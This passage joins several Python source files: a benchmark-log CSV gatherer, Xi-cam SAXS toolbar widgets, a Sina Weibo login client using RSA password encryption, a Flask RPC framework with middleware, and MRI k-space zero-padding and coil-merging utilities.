        df.at[name, model] = throughput
    df.at[name, "num_gpu"] = num_gpu
def create_row_batch_size(
    path_logs, mode, data, precision, key, num_gpu, name, df, is_train=True
):
    """Fill the DataFrame row `name` with per-model total batch sizes
    (per-GPU batch size from the log folder name, multiplied by `num_gpu`).

    Args:
        path_logs: root directory that contains the log folders.
        mode: parameter-update method ("replicated" or "parameter_server").
        data: data source tag ("syn" or "real").
        precision: "fp32" selects the fp32 logs; anything else selects fp16
            (preserving the original two-way branch).
        key: system key from `list_system`; log folders are "<key>.logs/...".
        num_gpu: number of GPUs used in the run.
        name: row index label in `df`.
        df: pandas DataFrame, updated in place.
        is_train: read training logs when True, inference logs otherwise.
    """
    # Folder layout: <key>.logs/<data>-<mode>-<precision>-<N>gpus[-inference]
    # (collapses the original four copy-pasted branches into one builder).
    precision_tag = "fp32" if precision == "fp32" else "fp16"
    folder = (
        key + ".logs/" + data + "-" + mode + "-" + precision_tag + "-"
        + str(num_gpu) + "gpus"
    )
    if not is_train:
        folder += "-inference"
    for model in list_test:
        batch_size, _ = get_result(path_logs, folder, model)
        df.at[name, model] = int(batch_size) * num_gpu
    df.at[name, "num_gpu"] = num_gpu
def main():
    """Collect benchmark logs and write the train throughput and train
    batch-size tables as CSV files."""
    parser = argparse.ArgumentParser(description="Gather benchmark results.")
    parser.add_argument(
        "--path", type=str, default="logs", help="path that has the logs"
    )
    parser.add_argument(
        "--mode",
        type=str,
        default="replicated",
        choices=["replicated", "parameter_server"],
        help="Method for parameter update",
    )
    parser.add_argument(
        "--data",
        type=str,
        default="syn",
        choices=["syn", "real"],
        help="Choose between synthetic data and real data",
    )
    parser.add_argument(
        "--precision",
        type=str,
        default="fp32",
        choices=["fp32", "fp16"],
        # Fixed typo: "becnhmark" -> "benchmark".
        help="Choose benchmark precision",
    )
    args = parser.parse_args()

    # One column per model, plus the GPU count.
    columns = ["num_gpu"] + list(list_test)
    # One row per experiment name, in sorted-system order.
    list_row = [
        name for _, value in sorted(list_system.items()) for name in value[1]
    ]

    # Train throughput table.
    df_throughput = pd.DataFrame(index=list_row, columns=columns)
    for key, (num_gpus, names) in list_system.items():
        for num_gpu, name in zip(num_gpus, names):
            create_row_throughput(
                args.path,
                args.mode,
                args.data,
                args.precision,
                key,
                num_gpu,
                name,
                df_throughput,
            )
    df_throughput.index.name = "name_gpu"
    df_throughput.to_csv("tf-train-throughput-" + args.precision + ".csv")

    # NOTE: inference tables were previously sketched here as commented-out
    # code; use create_row_throughput(..., is_train=False) when needed.

    # Train batch-size table.
    df_bs = pd.DataFrame(index=list_row, columns=columns)
    for key, (num_gpus, names) in list_system.items():
        for num_gpu, name in zip(num_gpus, names):
            create_row_batch_size(
                args.path,
                args.mode,
                args.data,
                args.precision,
                key,
                num_gpu,
                name,
                df_bs,
            )
    df_bs.index.name = "name_gpu"
    df_bs.to_csv("tf-train-bs-" + args.precision + ".csv")
# Script entry point: parse CLI args and emit the benchmark CSVs.
if __name__ == "__main__":
    main()
|
<reponame>ihumphrey/Xi-cam.SAXS
from typing import Callable, Union
from qtpy.QtWidgets import *
from qtpy.QtCore import *
from qtpy.QtGui import *
from xicam.plugins.widgetplugin import QWidgetPlugin
from xicam.gui.static import path
from xicam.core.execution.workflow import Workflow
from xicam.plugins import OperationPlugin
from xicam.gui.widgets.menuview import MenuView
from xicam.gui.widgets.ROI import ArcROI, LineROI, BetterPolyLineROI, BetterRectROI, SegmentedRectROI
from xicam.core import msg
from functools import partial
import pyqtgraph as pg
class SAXSToolbarBase(QToolBar):
    """Base toolbar for the SAXS GUI: shared signals plus a QAction factory."""
    name = 'SAXSToolbar'
    # Emitted to request a plot-cache refresh.
    sigPlotCache = Signal()
    # Emitted to request that the workflow be (re)run.
    sigDoWorkflow = Signal()
    # Emitted with the new detector/device name when the selection changes.
    sigDeviceChanged = Signal(str)

    def __init__(self, *args, **kwargs):
        # NOTE(review): **kwargs is accepted but not forwarded to QToolBar —
        # confirm this is intentional.
        super(SAXSToolbarBase, self).__init__(*args)

    def mkAction(self, iconpath: str = None, text=None, receiver=None, group=None, checkable=False, checked=False):
        """Build a QAction owned by this toolbar.

        Args:
            iconpath: icon path resolved through xicam's static `path` helper.
            text: display text for the action.
            receiver: slot connected to the action's `triggered` signal.
            group: QActionGroup the action should join (for exclusivity).
            checkable: whether the action is checkable.
            checked: initial checked state (applied only when truthy).

        Returns:
            The configured QAction.
        """
        actn = QAction(self)
        if iconpath: actn.setIcon(QIcon(QPixmap(str(path(iconpath)))))
        if text: actn.setText(text)
        if receiver: actn.triggered.connect(receiver)
        actn.setCheckable(checkable)
        if checked: actn.setChecked(checked)
        if group: actn.setActionGroup(group)
        return actn
class FieldSelector(SAXSToolbarBase):
    """Toolbar section with a combo box for choosing the detector field."""

    def __init__(self, headermodel: QStandardItemModel, selectionmodel: QItemSelectionModel, *args, **kwargs):
        self.headermodel = headermodel
        self.selectionmodel = selectionmodel
        # Refresh the detector list whenever the header model changes.
        self.headermodel.dataChanged.connect(self.updatedetectorcombobox)
        # NOTE(review): *args/**kwargs are accepted but not forwarded to the
        # superclass — confirm intentional.
        super(FieldSelector, self).__init__()
        self.addWidget(QLabel("Detector: "))
        self.detectorcombobox = QComboBox()
        self.detectorcombobox.setSizeAdjustPolicy(QComboBox.AdjustToContents)
        self.addWidget(self.detectorcombobox)
        self.addSeparator()
        # Re-emit detector selection changes as sigDeviceChanged.
        self.detectorcombobox.currentTextChanged.connect(self.sigDeviceChanged)

    def updatedetectorcombobox(self, start, end):
        """Repopulate the detector combo box from the currently selected
        catalog's "scattering" techniques. `start`/`end` are the model-change
        indices from dataChanged (unused)."""
        if self.headermodel.rowCount():
            # TODO-- remove hard-coding of stream
            stream = "primary"
            item = self.headermodel.item(self.selectionmodel.currentIndex().row())
            # fields = getattr(item.data(Qt.UserRole), stream).to_dask().keys()
            catalog = item.data(Qt.UserRole)  # type: Catalog
            # Pull the image-field name out of each scattering technique entry.
            fields = [ technique["data_mapping"]["data_image"][1] for technique in catalog.metadata["techniques"] if technique["technique"] == "scattering" ]
            self.detectorcombobox.clear()
            self.detectorcombobox.addItems(fields)
class ModeSelector(SAXSToolbarBase):
    """Toolbar section with mutually exclusive display-mode actions:
    raw, cake (q/chi), and Ewald-sphere remesh."""

    def __init__(self, *args, **kwargs):
        super(ModeSelector, self).__init__(*args, **kwargs)
        # Exclusive group: exactly one display mode is checked at a time.
        self.modegroup = QActionGroup(self)
        self.rawaction = self.mkAction('icons/raw.png', 'Raw', checkable=True, group=self.modegroup, checked=True)
        self.addAction(self.rawaction)
        self.cakeaction = self.mkAction('icons/cake.png', 'Cake (q/chi plot)', checkable=True, group=self.modegroup)
        self.addAction(self.cakeaction)
        self.remeshaction = self.mkAction('icons/remesh.png', 'Wrap Ewald Sphere', checkable=True, group=self.modegroup)
        self.addAction(self.remeshaction)
        self.addSeparator()
# TODO maybe toolbar is not the best solution here, instead having the buttonbox in the compare stage
# class ResultsModeSelector(SAXSToolbarBase):
# def __init__(self, *args, **kwargs):
# super(ResultsModeSelector, self).__init__(*args, **kwargs)
# self.viewmodegroup = QActionGroup(self)
# self.tabmode = self.mkAction(iconpath='icons/tabs.png', text='Tab View', checkable=True, group=self.viewmodegroup, checked=True)
# self.addAction(self.tabmode)
# self.gridmode = self.mkAction(iconpath='icons/grid.png', text='Grid View', checkable=True, group=self.viewmodegroup)
# self.addAction(self.gridmode)
# self.addSeparator()
class MultiPlot(SAXSToolbarBase):
    """Toolbar section with a checkable "Plot Series" action that triggers
    the workflow when toggled."""

    def __init__(self, *args, **kwargs):
        super(MultiPlot, self).__init__(*args, **kwargs)
        self.multiplot = QAction(self)
        self.multiplot.setIcon(QIcon(str(path('icons/multiplot.png'))))
        self.multiplot.setText('Plot Series')
        self.multiplot.setCheckable(True)
        # Toggling the action requests a workflow run.
        self.multiplot.triggered.connect(self.sigDoWorkflow)
        self.addAction(self.multiplot)
        self.addSeparator()
class ROIs(SAXSToolbarBase):
    """Toolbar section with a menu button that creates ROIs on the image view
    and wires each ROI's operation into the workflow."""

    def __init__(self, *args, view: Union[Callable, pg.ImageView] = None, workflow=None, index=-1, **kwargs):
        super(ROIs, self).__init__(*args, **kwargs)
        self.workflow = workflow
        self.view = view  # an ImageView, or a callable returning one
        self.index = index  # Where to insert the ROIs process into the workflow (default append)
        # New ROIs are sized to this fraction of the image bounds.
        self._scale_factor = .33
        self.roi_button = QToolButton()
        self.roi_button.setText("Create ROI")
        self.roi_button.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
        self.roi_button.setPopupMode(QToolButton.InstantPopup)
        self.roi_menu = QMenu()
        self.roi_button.setMenu(self.roi_menu)
        # TODO -- disable button until we have loaded data
        self.arc_roi = self.mkAction('icons/roi_arc.png', 'Arc ROI', self.add_arc)
        self.roi_menu.addAction(self.arc_roi)
        self.line_roi = self.mkAction('icons/roi_line.png', 'Line ROI', self.add_line)
        self.roi_menu.addAction(self.line_roi)
        self.polygon_roi = self.mkAction('icons/roi_polygon.png', 'Polygon ROI', self.add_polygon)
        self.roi_menu.addAction(self.polygon_roi)
        self.rect_segmented_roi = self.mkAction('icons/roi_rect_segmented.png', 'Segmented Rectangular ROI',
                                                self.add_rect_segmented)
        self.roi_menu.addAction(self.rect_segmented_roi)
        self.rect_roi = self.mkAction('icons/roi_rect.png', 'Rectangular ROI', self.add_rect)
        self.roi_menu.addAction(self.rect_roi)
        self.addWidget(self.roi_button)
        self.addSeparator()

    # TODO: scale roi's by inspecting self.view
    def _get_view(self):
        """Resolve `self.view` (which may be a callable) to the image view."""
        view = self.view
        if callable(view):
            view = view()
        return view

    def _scaled_size(self):
        """Return (width, height) for a new ROI — the image bounds scaled by
        `_scale_factor` — or (-1, -1) when no view is available."""
        view = self._get_view()
        if view:
            image_bound = view.imageItem.boundingRect()
            width = image_bound.width()
            height = image_bound.height()
            return width * self._scale_factor, height * self._scale_factor
        return -1, -1

    def _rect_origin(self):
        """Return the top-left origin that centers a `_scaled_size` ROI in
        the image bounds, or (-1, -1) when no view is available."""
        view = self._get_view()
        if view:
            image_bound = view.imageItem.boundingRect()
            width = image_bound.width()
            height = image_bound.height()
            origin_x = image_bound.x() + width / 2 - width / 2 * self._scale_factor
            origin_y = image_bound.y() + height / 2 - height / 2 * self._scale_factor
            return origin_x, origin_y
        return -1, -1

    def add_roi(self, roi):
        """Add `roi` to the image view and insert its operation into the
        workflow; warn instead when no image is loaded."""
        view = self._get_view()
        if view:
            view.getView().addItem(roi)
            self.workflow.insert_operation(self.index, roi.operation)
            # Remove the roi process from the workflow when the roi is removed
            # TODO -- should this be in BetterROI?
            roi.sigRemoveRequested.connect(lambda removed_roi: self.workflow.remove_operation(removed_roi.operation))
        else:
            msg.notifyMessage("Please open an image before creating an ROI.", level=msg.WARNING)

    def add_arc(self):
        """Create a default arc ROI at the origin."""
        self.add_roi(ArcROI(center=(0, 0), radius=.25))

    def add_horizontal(self):
        ...

    def add_line(self):
        """Create a horizontal line ROI centered vertically in the image."""
        # Fixed: resolve the view through _get_view() (self.view may be a
        # plain ImageView rather than a callable), consistent with
        # _scaled_size() and _rect_origin().
        image_bound = self._get_view().imageItem.boundingRect()
        width = image_bound.width()
        height = image_bound.height()
        x = image_bound.x() + width / 2 + width / 2 * self._scale_factor
        y = image_bound.y() + height / 2
        self.add_roi(LineROI(pos1=(self._rect_origin()[0], y), pos2=(x, y), width=self._scaled_size()[0]))

    def add_polygon(self):
        """Create a rectangular 4-point polyline ROI centered in the image."""
        rect = QRectF(QPointF(*self._rect_origin()), QSizeF(*self._scaled_size()))
        points = [(point.x(), point.y()) for point in [rect.bottomLeft(),
                                                       rect.bottomRight(),
                                                       rect.topRight(),
                                                       rect.topLeft()]]
        self.add_roi(BetterPolyLineROI(points, closed=True))

    def add_rect(self):
        """Create a rectangular ROI centered in the image."""
        self.add_roi(BetterRectROI(pos=self._rect_origin(), size=self._scaled_size()))

    def add_rect_segmented(self):
        """Create a segmented rectangular ROI centered in the image."""
        self.add_roi(SegmentedRectROI(pos=self._rect_origin(), size=self._scaled_size()))

    def add_vertical(self):
        ...
class SAXSToolbarRaw(FieldSelector):
    """Toolbar for the raw-data stage: detector field selection only."""
    pass
class SAXSToolbarMask(FieldSelector):
    """Toolbar for the masking stage: detector field selection only."""
    pass
class SAXSToolbarReduce(MultiPlot, ROIs, ModeSelector):
    """Toolbar for the reduce stage, combining the series-plot toggle, ROI
    creation, and display-mode selection via cooperative multiple
    inheritance (MRO: MultiPlot -> ROIs -> ModeSelector)."""

    def __init__(self, *args, **kwargs):
        super(SAXSToolbarReduce, self).__init__(*args, **kwargs)
# class SAXSToolbarCompare(ResultsModeSelector):
# pass
|
<filename>01 weibo/weibo.py<gh_stars>0
# -*- coding: utf-8 -*-
# @Author : Leo
import os
import rsa
import time
import base64
import requests
import binascii
from urllib.parse import quote
class LoginSinaWeibo:
    """
    Sina Weibo login client.

    Both the username and the password are encrypted before submission;
    the password is encrypted with RSA.
    """
    # NOTE(review): the session is a class attribute, so all instances share
    # one cookie jar — confirm this is intentional.
    session = requests.session()

    def __init__(self, username, password):
        self.username = username
        self.password = password
        # Version of Sina's ssologin.js that this client emulates.
        self.ssologin_version = 'v1.4.18'
        # Weibo login landing page (visited once to initialize cookies).
        self.login_home_url = 'https://weibo.com/login.php'
        # Pre-login endpoint returning servertime/nonce/pubkey/rsakv.
        self.pre_login_params_url = 'https://login.sina.com.cn/sso/prelogin.php'
        # Endpoint that receives the actual login form data.
        self.real_login_url = 'https://login.sina.com.cn/sso/login.php?client=ssologin.js({js_version})&_={ts}'.format(
            js_version=self.ssologin_version, ts=int(time.time()))
        # Captcha image URL template.
        self.captcha_url = "http://login.sina.com.cn/cgi/pin.php?r={ts}&s=0&p={pcid}"
        self.session.headers.update(
            {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"})
        self._init_session()
        # Whether login has succeeded.
        self.login_success = False
        # Profile info of the logged-in user.
        self.user_info = None

    def login(self):
        """Perform the login.

        Returns:
            dict with keys 'code' (0 on success, 1 otherwise), 'state'
            ('success'/'failed') and a human-readable 'message'.
        """
        login_status_info = {'code': 1, 'state': 'failed', 'message': ''}
        login_form_data = self._pre_login()
        login_resp = self.session.post(url=self.real_login_url, data=login_form_data)
        login_resp_json = login_resp.json()
        # retcode '0' means the login succeeded.
        if login_resp_json.get('retcode') == '0':
            self.login_success = True
            self.user_info = {'username': login_resp_json.get('uid'), 'nickname': login_resp_json.get('nick')}
            login_status_info['code'] = 0
            login_status_info['state'] = 'success'
            login_status_info['message'] = '登录成功,获取到的用户名: %s' % login_resp_json.get('nick')
        # retcode '2070': wrong captcha; the server explains in 'reason'.
        elif login_resp_json.get('retcode') == '2070':
            login_status_info['message'] = '登录失败,%s' % login_resp_json.get('reason')
        # retcode '101': failure reported via the 'reason' field.
        elif login_resp_json.get('retcode') == '101':
            login_status_info['message'] = '登录失败,%s' % login_resp_json.get('reason')
        else:
            login_status_info['message'] = '登录失败,登录返回结果 %s' % login_resp.text
        return login_status_info

    def get_user_info(self):
        """Return the user's profile info.

        :return: dict when logged in, otherwise None
        """
        return self.user_info if self.login_success else None

    def get_login_cookies(self) -> dict:
        """Return the session cookies captured after login."""
        return requests.utils.dict_from_cookiejar(self.session.cookies)

    def _init_session(self):
        """Warm up the session by visiting the login landing page."""
        try:
            self.session.get(url=self.login_home_url)
        except requests.exceptions.RequestException:
            # Best-effort warm-up; login may still proceed without it.
            pass

    def _pre_login(self):
        """Run the pre-login handshake and build the login form data."""
        # Encoded username to submit.
        s_username = self._get_su()
        # Parameters required for the login request.
        json_data = self._get_login_form_data(su=s_username)
        # Encrypted password string to submit.
        s_password = self._get_s_password(server_time=json_data.get('servertime'),
                                          nonce=json_data.get('nonce'),
                                          pubkey=json_data.get('pubkey'))
        # Form data submitted with the login request.
        login_form_data = {
            'entry': 'weibo',
            'gateway': '1',
            'from': '',
            'savestate': '7',
            'userticket': '1',
            'vsnf': '1',
            'service': 'miniblog',
            'encoding': 'UTF-8',
            'pwencode': 'rsa2',
            'sr': '1280*800',
            'prelt': '529',
            'url': 'http://weibo.com/ajaxlogin.php?framelogin=1&callback=parent.sinaSSOController.feedBackUrlCallBack',
            'rsakv': json_data.get('rsakv'),
            'servertime': json_data.get('servertime'),
            'nonce': json_data.get('nonce'),
            'su': s_username,
            'sp': s_password,
            'returntype': 'TEXT'
        }
        # A 'pcid' in the pre-login response means a captcha is required.
        if json_data.get('pcid'):
            current_captcha_url = self.captcha_url.format(ts=int(time.time()), pcid=json_data.get('pcid'))
            captcha_resp = self.session.get(url=current_captcha_url)
            temp_captcha_file = 'weibo_captcha.jpg'
            # Fixed: the file handle was left open (open(...).write(...)).
            with open(temp_captcha_file, 'wb') as captcha_file:
                captcha_file.write(captcha_resp.content)
            # TODO 2019-06-24: captcha recognition API available at
            # http://captcha.faceme.site/sina — see README-IDEAs.md for usage.
            captcha_text = input('验证码保存路径为 %s\n验证码的值为> ' % os.path.abspath(temp_captcha_file))
            login_form_data['pcid'] = json_data.get('pcid')
            login_form_data['door'] = captcha_text
        return login_form_data

    def _get_su(self):
        """Return the username as actually submitted in the login form."""
        # URL-encode the username first...
        username_quote = quote(self.username)
        # ...then base64-encode it.
        username_base64 = base64.b64encode(username_quote.encode('utf-8'))
        return username_base64.decode('utf-8')

    def _get_s_password(self, server_time, nonce, pubkey):
        """Return the encrypted password string used for login."""
        # Message format: "<servertime>\t<nonce>\n<password>", RSA-encrypted.
        encode_password = (str(server_time) + "\t" + str(nonce) + "\n" + str(self.password)).encode("utf-8")
        public_key = rsa.PublicKey(int(pubkey, 16), int('10001', 16))
        encry_password = rsa.encrypt(encode_password, public_key)
        # Fixed: the hex-encoding call was corrupted in the source; the form's
        # pwencode field is 'rsa2', which expects the ciphertext hex-encoded.
        password = binascii.b2a_hex(encry_password)
        return password.decode()

    def _get_login_form_data(self, su):
        """Fetch the pre-login parameters (`servertime`, `nonce`, `pubkey`,
        `rsakv`, `showpin`, etc.)."""
        pre_login_params = {
            'entry': 'weibo',
            'rsakt': 'mod',
            'checkpin': '1',
            'client': 'ssologin.js({js_version})'.format(js_version=self.ssologin_version),
            'su': su,
            '_': int(time.time() * 1000)}
        try:
            resp = self.session.get(url=self.pre_login_params_url, params=pre_login_params)
            if resp.status_code == 200 and resp.json().get('retcode') == 0:
                json_data = resp.json()
                return json_data
            else:
                raise ValueError('请求获取的数据无效')
        except (requests.exceptions.RequestException, ValueError):
            raise Exception('获取form-data参数出错')
if __name__ == '__main__':
    # Fixed: the credential placeholders were corrupted ('<PASSWORD>'),
    # which is a syntax error. Fill in real credentials before running.
    test_username = 'your username'
    test_password = 'your password'
    loginer = LoginSinaWeibo(username=test_username, password=test_password)
    # Perform the login.
    login_result = loginer.login()
    print('登录结果:', login_result)
    # Fetch the logged-in user's profile info.
    user_info = loginer.get_user_info()
    print('用户信息:', user_info)
    # Fetch the post-login cookies.
    cookies = loginer.get_login_cookies()
    print('登录Cookies:', cookies)
|
# coding=utf-8
import json
from enum import Enum
from typing import Callable, Any
from flask import Flask, request as flask_request
MiddlewareType = Enum('MiddlewareType', ('Request', 'Response'))
class Middleware:
    """A hook that runs before (Request) or after (Response) a module function.

    Attributes:
        func: callable invoked with the request (or response) object.
        tag: optional tag restricting this middleware to functions sharing it;
            None applies it to every function of the module.
        weight: ordering key; higher-weight middleware runs first.
        type: whether this runs in the request or the response phase.
    """
    # Fixed: these were class attributes assigned the type objects themselves
    # (e.g. ``func = Callable``); converted to proper annotations.
    func: Callable
    tag: str
    weight: int
    type: MiddlewareType

    def __init__(
            self,
            func: Callable,
            tag: str = None,
            weight: int = 0,
            m_type: MiddlewareType = MiddlewareType.Request
    ):
        self.func = func
        self.tag = tag
        self.weight = weight
        self.type = m_type
class Module:
    """A named group of callable functions with taggable middleware."""
    # Fixed: these were class attributes assigned the type objects themselves
    # (e.g. ``name = str``); converted to proper annotations.
    name: str
    __registered_function: bool
    __middleware: dict
    __function: dict

    def __init__(self, name: str):
        self.name = name
        # The '' key holds untagged middleware, applied to every function.
        self.__middleware = {
            '': list()
        }
        self.__function = dict()
        self.__registered_function = False

    def register_middleware(self, middleware: Middleware) -> None:
        """Register a middleware; must happen before any function is
        registered."""
        if self.__registered_function:
            raise Exception('Can\'t register middleware after called function')
        if middleware.tag is None:
            self.__middleware[''].append(middleware)
        else:
            if middleware.tag not in self.__middleware:
                self.__middleware[middleware.tag] = list()
            self.__middleware[middleware.tag].append(middleware)

    def request(self, request):
        """Dispatch `request` through middleware and the target function.

        Runs Request-phase middleware (by descending weight), calls the
        function with ``request.args``, stores the result on
        ``request.response``, then runs Response-phase middleware.
        """
        if request.function not in self.__function:
            raise Exception('function not found')
        all_middleware = list(self.__middleware[''])
        req_func = self.__function[request.function]
        if req_func.tags is not None:
            for tag in req_func.tags:
                # Fixed: a function tag with no registered middleware used to
                # raise KeyError; treat it as "no middleware for this tag".
                all_middleware.extend(self.__middleware.get(tag, ()))
        all_middleware.sort(key=lambda mid: mid.weight, reverse=True)
        for middleware in all_middleware:
            if middleware.type != MiddlewareType.Request:
                continue
            new_request = middleware.func(request)
            if new_request is not None:
                request = new_request
        request.response = req_func.f(**request.args)
        for middleware in all_middleware:
            if middleware.type != MiddlewareType.Response:
                continue
            new_response = middleware.func(request.response)
            if new_response is not None:
                request.response = new_response

    def function(self, name: str, tags: list = None):
        """Decorator registering the wrapped callable under `name` with the
        given optional tags."""
        def decorator(f):
            self.__registered_function = True
            self.__function[name] = _ModuleFunction(f=f, tags=tags)
            return f
        return decorator
class _ModuleFunction:
f = Callable
tags = list
def __init__(self, f: Callable, tags: list = None):
self.f = f
self.tags = tags
class Error(BaseException):
    """Application-level error carried through to the JSON response.

    NOTE(review): subclasses BaseException rather than Exception, so generic
    ``except Exception`` handlers will NOT catch it — confirm intended.
    """
    # Fixed: these were class attributes assigned the type objects themselves
    # (``code = int`` / ``message = str``); converted to proper annotations.
    code: int
    message: str

    def __init__(self, code: int = 0, msg: str = ''):
        self.code = code
        self.message = msg
class Response:
    """JSON-serializable wrapper around response data plus an Error."""
    # Fixed: these were class attributes assigned the type objects themselves
    # (``data = dict`` / ``error = Error``); converted to proper annotations.
    data: dict
    error: Error

    def __init__(self, data: Any = None, error: Error = None) -> None:
        """Build a response.

        Args:
            data: dict or list payload; defaults to an empty dict.
                (Fixed: the original annotation was the invalid tuple form
                ``(dict, list)``.)
            error: Error to report; defaults to a success Error() (code 0).
        """
        if data is None:
            self.data = dict()
        else:
            self.data = data
        if error is None:
            self.error = Error()
        else:
            self.error = error

    @property
    def response(self) -> str:
        """The JSON string sent back to the client."""
        return json.dumps(dict(data=self.data, error=self.error), cls=ResponseEncoder)
class Request:
    """Parses an RPC-style request dict and immediately dispatches it."""
    # Fixed: these were class attributes assigned the type objects themselves
    # (e.g. ``module = Module``); converted to proper annotations.
    module: Module
    function: str
    args: dict
    response: Response

    def __init__(self, req: dict):
        # Validate the request envelope before dispatching.
        if 'module' not in req or 'function' not in req or 'args' not in req:
            raise Exception('wrong request arguments')
        self.module = App.get_instance().get_module(req['module'])
        self.function = req['function']
        self.args = req['args']
        # Dispatch immediately; the module stores the result on self.response.
        self.module.request(self)
class ResponseEncoder(json.JSONEncoder):
    """JSON encoder that knows how to serialize Error objects."""

    def default(self, o: Any) -> Any:
        if isinstance(o, Error):
            return {'code': o.code, 'msg': o.message}
        return super().default(o)
class App(Flask):
    """Singleton Flask app exposing registered modules through one POST
    endpoint."""
    __instance = None
    # Fixed: was ``__modules = dict`` (a class attribute holding the type
    # object); converted to an annotation.
    __modules: dict

    def __new__(cls, *args, **kwargs):
        if not cls.__instance:
            # Fixed: object.__new__ must not receive the constructor
            # arguments (passing them raised TypeError for App(name=...));
            # they are consumed by __init__.
            cls.__instance = super().__new__(cls)
        return cls.__instance

    def __init__(self, name: str = 'lazy_flask', endpoint: str = '/query'):
        # Guard against re-initialization: __init__ runs on every App(...)
        # call even though __new__ returns the same instance, and adding the
        # url rule twice would fail.
        if getattr(self, '_App__initialized', False):
            return
        super().__init__(name)
        self.__modules = dict()
        # Fixed: was ``self.__instance.add_url_rule`` — the instance is self.
        self.add_url_rule(endpoint, None, App.query, methods=['POST'])
        self.__initialized = True

    def register_module(self, module: Module) -> None:
        """Make `module` reachable by name from incoming requests."""
        self.__modules[module.name] = module

    def get_module(self, name: str) -> Module:
        """Return the registered module called `name`, or raise."""
        if name not in self.__modules:
            raise Exception('{} not in modules'.format(name))
        return self.__modules[name]

    @staticmethod
    def query():
        """Flask view: parse the JSON body, dispatch it, return the JSON reply.

        NOTE(review): assumes the dispatched function stored a Response object
        on the request (``req.response.response``) — confirm module functions
        return Response instances.
        """
        try:
            req = Request(flask_request.json)
            return req.response.response
        except Error as e:
            return Response(error=e).response

    @staticmethod
    def get_instance():
        """Return the singleton instance (None before first construction)."""
        return App.__instance
|
<reponame>mikgroup/subtle_data_crimes
import numpy as np
from PIL import Image
import os
def calc_pad_half(N_original, pad_ratio):
    """Compute the one-sided zero-padding length for a k-space dimension.

    Args:
        N_original: original size along the dimension.
        pad_ratio: desired total-size ratio after padding.

    Returns:
        (pad_half_vec, N_tot): the padding length applied to EACH side
        (int), and the target total size N_original * pad_ratio (float).
    """
    N_tot = N_original * pad_ratio  # total k-space size after padding
    # Total padding length, rounded up and converted to int.
    total_pad = np.ceil(N_tot - N_original).astype(int)
    # Half of the padding goes on each side of the axis.
    half_pad = (total_pad / 2).astype(int)
    return half_pad, N_tot
def pad_multicoil_ksp(ksp_slice, pad_ratio):
    """Zero-pad multi-coil k-space data of a single slice, coil by coil.

    An (N_coils, NX, NY) array becomes roughly
    (N_coils, NX*pad_ratio, NY*pad_ratio); the coil axis is untouched.

    Args:
        ksp_slice: k-space array with dimensions (N_coils, NX, NY).
        pad_ratio: scalar zero-padding factor.

    Returns:
        The zero-padded k-space array.
    """
    nx = ksp_slice.shape[1]
    ny = ksp_slice.shape[2]
    half_x, _ = calc_pad_half(nx, pad_ratio)
    half_y, _ = calc_pad_half(ny, pad_ratio)
    # Pad only the two spatial axes; each side of an axis gets "half".
    pad_widths = ((0, 0), (half_x, half_x), (half_y, half_y))
    return np.pad(ksp_slice, pad_widths, mode='constant', constant_values=(0, 0))
def merge_multicoil_data(ksp_slice_all_coils):
    """Merge *complex* multi-coil k-space into one *magnitude* image using
    the square Root Sum of Squares (RSS).

    Expected input dimensions: [Ncoils, Sx, Sy] — data of a *single slice*.
    """
    coil_ksp = ksp_slice_all_coils[:, :, :].squeeze()  # eliminate slice dimension
    n_coils, sx, sy = coil_ksp.shape
    squared_images = np.empty([n_coils, sx, sy])
    for c in range(n_coils):
        # Per-coil complex image, then its squared magnitude.
        single_coil_image = np.fft.fftshift(np.fft.ifft2(coil_ksp[c, :, :].squeeze()))
        squared_images[c, :, :] = np.abs(single_coil_image) ** 2
    return np.sqrt(np.sum(squared_images, axis=0))
def zpad_merge_scale(ksp_block_multicoil, pad_ratio):
    """Zero-pad multi-coil k-space by `pad_ratio` (e.g. 2x, 3x), merge the
    coil images into a single magnitude image, and normalize its intensity
    by the 98th-percentile magnitude.

    Args:
        ksp_block_multicoil: numpy array of size [Ncoils, NX, NY].
        pad_ratio: scalar denoting the desired padding ratio.

    Returns:
        The intensity-normalized magnitude image.
    """
    nx = ksp_block_multicoil.shape[1]
    ny = ksp_block_multicoil.shape[2]
    # Zero-pad the two spatial axes symmetrically.
    half_x, _ = calc_pad_half(nx, pad_ratio)
    half_y, _ = calc_pad_half(ny, pad_ratio)
    pad_widths = ((0, 0), (half_x, half_x), (half_y, half_y))
    padded_ksp = np.pad(ksp_block_multicoil, pad_widths, mode='constant',
                        constant_values=(0, 0))
    # Collapse the coils into a single *magnitude* image.
    magnitude_image = merge_multicoil_data(padded_ksp)
    # Intensity normalization by the 98% percentile.
    sorted_vals = np.sort(magnitude_image.reshape(-1))
    k = int(round(0.98 * sorted_vals.shape[0]))
    return magnitude_image / sorted_vals[k]
# --------------------- JPEG compression ----------------------------
def JPEG_compression(im_mag, quality_val=100):
    '''Apply lossy JPEG compression to a magnitude image and return the result.

    inputs:
        im_mag - a magnitude image (2D array with non-negative values)
        quality_val - a parameter that controls the JPEG compression quality:
            quality_val=100 yields the minimal compression
            quality_val=75 is JPEG's default
            quality_val=5 (or close to 0) yields an extreme compression
    returns:
        im_compressed - the decompressed image, scaled back to [0, 1]
    '''
    # normalize the range to [0,1]
    im_mag = im_mag / np.max(im_mag)
    # map [0,1] to the uint8 range [0,255] expected by JPEG
    scale_factor = 255  # 255 / np.max(im_mag)
    im_mag_scaled = im_mag * scale_factor
    im_mag_uint8 = (im_mag_scaled).astype('uint8')  # prepare for JPEG compression
    im_PIL = Image.fromarray(im_mag_uint8)  # apply lossy compression by saving in JPEG format

    jpeg_figs_folder = "jpeg_imgs_q" + str(quality_val) + "/"
    # exist_ok avoids the race between the existence check and the creation
    # that the previous exists()/makedirs() pair had
    os.makedirs(jpeg_figs_folder, exist_ok=True)

    # compress the image by saving it in JPEG format
    # (subsampling=0 keeps full chroma resolution)
    im_comp_filename = os.path.join(
        jpeg_figs_folder, 'im_compressed_q{}.jpg'.format(quality_val))
    im_PIL.save(im_comp_filename, format='JPEG', quality=quality_val, subsampling=0)

    # load the JPEG image back and restore the [0, 1] range
    im_compressed = np.asarray(Image.open(im_comp_filename))  # pillow -> numpy
    im_compressed = im_compressed / scale_factor
    return im_compressed
# -------------------- calc_R_actual -------------------------------
def calc_R_actual(mask):
    """Return the actual acceleration factor R of a sampling mask.

    R is the ratio between the total number of k-space locations and the
    number of sampled (non-zero) ones.
    """
    flat = np.reshape(mask, (1, -1))
